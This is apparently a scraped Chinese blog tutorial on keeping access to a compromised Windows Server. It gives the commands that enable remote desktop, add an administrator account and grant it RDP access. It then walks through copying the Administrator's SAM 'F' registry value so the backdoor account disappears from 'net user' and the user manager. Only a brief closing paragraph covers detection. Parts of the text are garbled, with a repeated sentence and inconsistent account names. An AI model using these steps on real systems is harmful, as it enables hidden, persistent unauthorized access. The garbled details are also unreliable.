丹阳做网站的,南宁360网,软件开发公司,网站消息推送系统隐藏账户是一种最为简单有效的权限维持方式#xff0c;其做法就是让攻击者创建一个新的具有管理员权限的隐藏账户#xff0c;因为是隐藏账户#xff0c;所以防守方是无法通过控制面板或命令行看到这个账户的。 自然我们需要一些前提条件#xff0c;比如说有一个网站其做法就是让攻击者创建一个新的具有管理员权限的隐藏账户因为是隐藏账户所以防守方是无法通过控制面板或命令行看到这个账户的。 自然我们需要一些前提条件比如说有一个网站我们获得了getshell如果他是windows系统我们以及拿到了administrator权限那么我们可以使用如下的方式来进行一个后门的走。
环境模拟准备
vmwindows_server2012准备一个存在漏洞的网站
物理机攻击此网站获取osshell权限
第一步开启远程连接
# 1.设置远程桌面端口详细指定具体的端口也可以不输入默认开启3389端口。
reg add HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /t REG_DWORD /v portnumber /d 3389 /f# 2.开启远程桌面
wmic RDTOGGLE WHERE ServerName%COMPUTERNAME% call SetAllowTSConnections 1#检查端口状态
netstat -an|find 3389#关闭远程桌面
wmic RDTOGGLE WHERE ServerName%COMPUTERNAME% call SetAllowTSConnections 0
添加一个用户
net user admin123 Admin654 /add
添加用户
net localgroup administrators admin123 /add
把用户添加至组
net user
可查看当前用户
net localgroup Remote Desktop Users admin123 /add
添加至允许远程连接
net localgroup Remote Desktop Users
查看允许远程连接的用户
使用远程连接连接计算机若是遇到如下问题可参考文献
通过远程桌面连接Windows实例时出现错误提示时的解决方案_云服务器 ECS(ECS)-阿里云帮助中心
出现身份验证错误。要求的函数不受支持
远程计算机:192.168.146.134这可能是由于 CredSSP 加密数据库修正若要了解详细信息请访问 https://go,microsoft,com/fwlink/?linkid866660 这样添加的用户可以使用net user查看或者在用户页面查看或lusrmgr.msc本地用户和组中都可以看到 第二步隐藏用户
我们这里使用修改注册表编辑器的方式来隐藏用户输入regedt32打开注册表编辑器并找到HKEY_LOCAL_MACHINE\SAM\SAM点击右键选择权限 将Administrator用户的权限设置成“完全控制” 重新打开注册表确保可以看到SAM路径下的文件 2.2.5 其次前往SAM/Domains/Account/Users/Names处选择Administrator用户在右侧的键值处可以找到对应的值如0x1f4然后从左侧的Users目录下可以找到对应的文件 然后从对应的000001F4文件中将键值对F的值复制出来。然后同理找到隐藏账户admin123所对的文件并将从Administrator文件中复制出来的F值粘贴进admin123文件中。 2.2.7最后将admin123和0x3f0从注册表中右键导出并删除wxiaoge$用户然后将刚刚导出的两个文件重新导入进注册表中即可实现wxiaoge用户的隐藏。
导出使用右键删除用户使用cmd net user admin123 /del 此时此账户在net user 和用户管理以及用户和组中均不可见也就是说只能在注册表编辑器中找到
额外之应急响应 将HKEY_LOCAL_MACHINE\SA\SAM\Domains\Account\Users\Names与管理工具-》计算机管理-》本地用户和组-》用户相互对比不存在的用户即为后门用户删除即可删除时应对于删除。
另外当隐藏之后无法远程登录的解决办法参考以下文献或自行网上搜索
https://www.cnblogs.com/ciscolee/p/15587768.html
